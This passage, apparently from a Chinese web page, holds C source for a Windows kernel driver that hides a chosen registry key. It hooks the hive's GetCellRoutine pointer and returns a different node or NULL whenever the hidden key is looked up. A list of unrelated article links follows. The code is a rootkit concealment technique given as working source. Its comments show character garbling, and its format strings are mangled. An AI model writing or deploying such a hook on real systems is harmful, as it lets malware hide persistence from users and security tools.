}
else
{
// 一般葉索引 ， 返回最后的節(jié)點(diǎn)
return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
}
}
// GetCell例程的鉤子函數(shù)
PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell)
{
// 調(diào)用原函數(shù)
PVOID pRet = g_pGetCellRoutine(Hive, Cell);
if (pRet)
{
// 返回的是需要隱藏的節(jié)點(diǎn)
if (pRet == g_HideNode)
{
DbgPrint("GetCellRoutine(%lx, lx) = %lxn", Hive, Cell, pRet);
// 查詢、保存并返回其父鍵的最后一個(gè)子鍵的節(jié)點(diǎn)
pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode);
DbgPrint("g_LastNode = %lxn", g_LastNode);
// 隱藏的正是最后一個(gè)節(jié)點(diǎn) ， 返回空值
if (pRet == g_HideNode) pRet = NULL;
}
// 返回的是先前保存的最后一個(gè)節(jié)點(diǎn)
else if (pRet == g_LastNode)
{
DbgPrint("GetCellRoutine(%lx, lx) = %lxn", Hive, Cell, pRet);
// 清空保存值 ， 并返回空值
pRet = g_LastNode = NULL;
}
}
return pRet;
}
NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj)
{
DbgPrint("DriverUnload()n");
// 解除掛鉤
if (g_ppGetCellRoutine) *g_ppGetCellRoutine = g_pGetCellRoutine;
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath)
{
ULONG BuildNumber;
ULONG KeyHiveOffset;;;;;// KeyControlBlock->KeyHive
ULONG KeyCellOffset;;;;;// KeyControlBlock->KeyCell
HANDLE hKey;
PVOID KCB, Hive;
DbgPrint("DriverEntry()n");
pDrvObj->DriverUnload = DriverUnload;
// 查詢BuildNumber
if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED;
DbgPrint("BuildNumber = %dn", BuildNumber);
// KeyControlBlock結(jié)構(gòu)各版本略有不同
// Cell的值一般小于0x80000000 ， 而Hive正相反 ， 以此來(lái)判斷也可以
switch (BuildNumber)
{
case 2195:;;// Win2000
KeyHiveOffset = 0xc;
KeyCellOffset = 0x10;
break;
case 2600:;;// WinXP
case 3790:;;// Win2003
KeyHiveOffset = 0x10;
KeyCellOffset = 0x14;
break;
default:
return STATUS_NOT_SUPPORTED;
}
// 打開需隱藏的鍵
hKey = OpenKeyByName(g_HideKeyName);
// 獲取該鍵的KeyControlBlock
KCB = GetKeyControlBlock(hKey);
if (KCB)
{
// 由KCB得到Hive
PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive);
// GetCellRoutine在KCB中 ， 保存原地址
g_ppGetCellRoutine = &Hive->GetCellRoutine;
g_pGetCellRoutine = Hive->GetCellRoutine;
DbgPrint("GetCellRoutine = %lxn", g_pGetCellRoutine);
// 獲取需隱藏的節(jié)點(diǎn)并保存
g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell));
// 掛鉤GetCell例程
Hive->GetCellRoutine = MyGetCellRoutine;
}
ZwClose(hKey);
return STATUS_SUCCESS;
}

推薦閱讀

• 

  怎么查看電腦系統(tǒng)什么時(shí)候安裝的
• 

  微信卸載后聊天記錄怎么恢復(fù) 手機(jī)微信卸載后如何恢復(fù)聊天記錄
• 

  夢(mèng)見紅衣女 夢(mèng)見紅衣女鬼什么預(yù)兆
• 

  男孩學(xué)物生地可以報(bào)什么專業(yè) 哪些好就業(yè)
• 

  雞肉的所有營(yíng)養(yǎng)有哪些功效
• 

  相照結(jié)尾的成語(yǔ)
• 

  電加熱管好壞怎么知道
• 

  華為 C7188所用的詳情
• 

  布達(dá)拉宮簡(jiǎn)介 布達(dá)拉宮是為誰(shuí)建造的
• 

  杭州山的占地面積
• 

  武火和文火哪個(gè)火大
• 

  春季五穴位艾灸祛濕
• 

  斑鳩與鴿子區(qū)別
• 

  小米5電池在哪個(gè)地方嗎,小米5的電池不耐用了
• 

  小編分享迅雷會(huì)員登錄不上怎么辦。
• 

  忌諸事不宜可以結(jié)婚嗎 諸事不宜

• 解決注冊(cè)表被惡意鎖定問題
• 2 我教你學(xué)之系統(tǒng)性能優(yōu)化注冊(cè)表修改實(shí)例
• 修改注冊(cè)表代碼 快速殺掉讓網(wǎng)速變慢的插件
• 用注冊(cè)表全方位掌控愛機(jī)
• 山東注冊(cè)會(huì)計(jì)師考試時(shí)間
• 鞋舌頭跑偏怎么辦？
• 系統(tǒng)維護(hù)四步曲之：注冊(cè)表維護(hù)
• 安全恢復(fù)Win 98系統(tǒng)的注冊(cè)表
• 注冊(cè)表減肥要小心 優(yōu)化工具不一定好用
• 注冊(cè)表的禁用及啟用方法